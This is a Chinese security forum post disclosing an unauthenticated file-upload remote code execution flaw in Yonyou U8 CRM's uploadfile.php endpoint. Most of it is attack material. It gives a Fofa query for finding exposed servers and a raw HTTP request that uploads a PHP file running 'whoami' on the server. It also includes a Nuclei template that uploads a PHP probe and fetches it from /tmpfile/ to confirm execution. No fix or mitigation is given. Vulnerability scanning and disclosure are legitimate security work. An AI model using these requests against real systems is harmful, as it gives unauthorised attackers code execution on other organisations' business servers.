安全矩阵

 找回密码
 立即注册
搜索
查看: 1155|回复: 0

用友U8 CRM uploadfile 文件上传致RCE漏洞

[复制链接]

32

主题

32

帖子

106

积分

注册会员

Rank: 2

积分
106
发表于 2024-6-3 22:45:14 | 显示全部楼层 |阅读模式
Fofa语法
title="用友U8CRM"
漏洞POC
POST /ajax/uploadfile.php?DontCheckLogin=1&vname=file HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Connection: close
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: multipart/form-data;boundary=----269520967239406871642430066855

------269520967239406871642430066855
Content-Disposition: form-data; name="file"; filename="1.php "
Content-Type: application/octet-stream

<?php system("whoami");unlink(__FILE__);?>
------269520967239406871642430066855
Content-Disposition: form-data; name="upload"

upload
------269520967239406871642430066855--

Nuclei
id: yonyou-crm-arbitrary-file-upload

info:
  name: Yonyou CRM - Arbitrary File Upload
  author: HK
  severity: high
  description: 用友CRM系统的uploadfile.php接口存在任意文件上传漏洞,攻击者可通过该漏洞上传任意文件。
  metadata:
    fofa-query: app="用友U8CRM"
  tags: yonyou,crm,fileupload

http:
  - raw:
    - |
      POST /ajax/uploadfile.php?DontCheckLogin=1&vname=file HTTP/1.1
      Host: {{Hostname}}
      Connection: close
      Content-Type: multipart/form-data; boundary=----WebKitFormBoundarydRVCGWq4Cx3Sq6tt

      ------WebKitFormBoundarydRVCGWq4Cx3Sq6tt
      Content-Disposition: form-data; name="file"; filename="%s.php "
      Content-Type: application/octet-stream

      <?php print(1111*2222);unlink(__FILE__);?>
      ------WebKitFormBoundarydRVCGWq4Cx3Sq6tt
      Content-Disposition: form-data; name="upload"

      upload
      ------WebKitFormBoundarydRVCGWq4Cx3Sq6tt--

    - |
      GET /tmpfile/{{uploadfile}} HTTP/1.1
      Host: {{Hostname}}

    extractors:
      - type: regex
        part: body
        group: 1
        name: uploadfile
        regex:
          - '(upd\w+\.tmp\.php)'
        internal: true

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '2468642'

      - type: status
        status:
          - 200


回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

小黑屋|安全矩阵

GMT+8, 2024-11-27 21:49 , Processed in 0.012045 second(s), 18 queries .

Powered by Discuz! X4.0

Copyright © 2001-2020, Tencent Cloud.

快速回复 返回顶部 返回列表